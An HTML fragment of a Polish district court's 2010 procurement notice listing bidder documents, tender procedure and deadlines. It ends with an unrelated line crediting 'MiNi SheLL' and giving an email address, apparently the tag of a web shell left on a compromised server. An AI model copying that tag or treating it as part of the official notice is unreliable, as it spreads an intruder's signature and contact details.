<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
</li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykaz pojazdów jakimi dysponuje Wykonawca do realizacji przedmiotu zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.warszawa.so.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sąd Rejonowy w Piasecznie, Oddział Finansowy, ul. Kościuszki 14, 05-500 Piaseczno, pok. nr 141..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.02.2010 godzina 10:00, miejsce: Sąd Rejonowy w Piasecznie, Oddział Finansowy, ul. Kościuszki 14, 05-500 Piaseczno, pok. nr 141..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com